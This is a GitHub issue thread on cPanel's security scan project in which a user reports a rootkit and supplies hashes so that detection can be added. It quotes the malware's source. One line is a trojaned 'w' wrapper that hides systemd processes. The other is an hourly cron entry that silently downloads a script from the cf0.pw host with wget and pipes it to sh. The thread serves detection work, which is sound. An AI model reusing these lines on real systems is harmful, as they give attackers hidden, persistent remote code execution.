search

CpanelInc / tech-CSI

cPanel Security Scan
Other
39 stars 24 forks source link

rootkit created /etc/cron.hourly/0 file with wget download plus two r… #13

Closed JQuags closed 1 year ago

JQuags commented 1 year ago

root kit from cf0.pw. Using a preload any binary calls created a /tmp file and check/created /etc/cron.hourly/0

cPanelPeter commented 1 year ago

Thank you. Will add this shortly. Do you happen to have the sha256 hash for the ELF binary?

cPanelPeter commented 1 year ago

implemented this patch

JQuags commented 1 year ago

Here are the hashes

67833062305246c82a3817a5038e0aec7de91931e64c4aeb9ef96b67a51a195d /usr/bin/w

Linked to /usr/bin/w-

/usr/bin/w source

/usr/bin/w­- $@ |grep -v systemd

982f9e0f089b91ba79df723435099df15c72e1201a45010ee60226ab136c93bf /etc/cron.hourly/0

/etc/cron.hourly/0 source

wget --quiet http://cf0.pw/0/etc/cron.hourly/0 -O- 2>/dev/null|sh>/dev/null 2>&1

and the downloaded elf 179824df02415e8a9df6eb698eef68c61827b95cfc254f86b57afdaa37b8955f